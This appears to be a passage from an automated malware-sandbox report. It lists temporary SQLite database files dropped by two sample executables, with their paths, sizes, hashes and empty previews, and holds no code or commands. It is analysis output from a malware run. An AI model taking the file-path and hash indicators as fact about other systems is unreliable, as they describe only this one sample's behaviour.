                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp8908.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp8928.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp8929.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp943C.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp945C.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp946D.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp949D.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpA6D4.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpA6E5.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpA6F6.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpA6F7.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpA707.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpA718.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpA729.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpA739.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpA73A.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpA9A1.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpA9B2.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpA9C2.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpC2E7.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpC308.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpC318.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpC329.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpC349.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpCC96.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpCCB6.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
